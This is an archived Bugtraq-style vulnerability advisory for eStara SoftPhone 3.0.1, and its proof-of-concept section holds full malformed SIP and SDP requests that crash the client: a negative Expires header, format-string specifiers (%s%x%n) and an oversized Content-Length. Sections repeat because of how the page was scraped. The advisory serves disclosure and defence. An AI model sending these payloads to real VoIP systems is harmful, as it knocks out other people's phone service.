eStara Softphone Multiple Denial of Service Vulnerabilities
BID:16629
Info
eStara Softphone Multiple Denial of Service Vulnerabilities
| Bugtraq ID: | 16629 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2006 12:00AM |
| Updated: | Feb 14 2006 09:58PM |
| Credit: | Discovered by ZwelL <[email protected]>. |
| Vulnerable: |
eStara SoftPhone 3.0.1 .47 eStara SoftPhone 3.0.1 .46 eStara SoftPhone 3.0.1 .14 |
| Not Vulnerable: | |
Discussion
eStara Softphone Multiple Denial of Service Vulnerabilities
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
Exploit / POC
eStara Softphone Multiple Denial of Service Vulnerabilities
The following examples were provided:
For the negative 'Expires' field issue:
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 <sip:[email protected]>;tag=1793
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
For the format string specifiers issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:[email protected]>;tag=3013
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
v=0
o=3013 3013 3013 %s%x%n IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:[email protected]>;tag=3013
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
%s=0
o=4085 4085 4085 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 %s%x%n 0
a=rtpmap:0 PCMU/8000
For the 'Content-Length' field issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 <sip:[email protected]>;tag=2386
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: application/sdp
Content-Length: 1111111111
v=0
o=2386 2386 2386 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
The following examples were provided:
For the negative 'Expires' field issue:
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 <sip:[email protected]>;tag=1793
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
For the format string specifiers issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:[email protected]>;tag=3013
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
v=0
o=3013 3013 3013 %s%x%n IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:[email protected]>;tag=3013
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
%s=0
o=4085 4085 4085 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 %s%x%n 0
a=rtpmap:0 PCMU/8000
For the 'Content-Length' field issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 <sip:[email protected]>;tag=2386
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: application/sdp
Content-Length: 1111111111
v=0
o=2386 2386 2386 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
Solution / Fix
eStara Softphone Multiple Denial of Service Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
eStara Softphone Multiple Denial of Service Vulnerabilities
References:
References: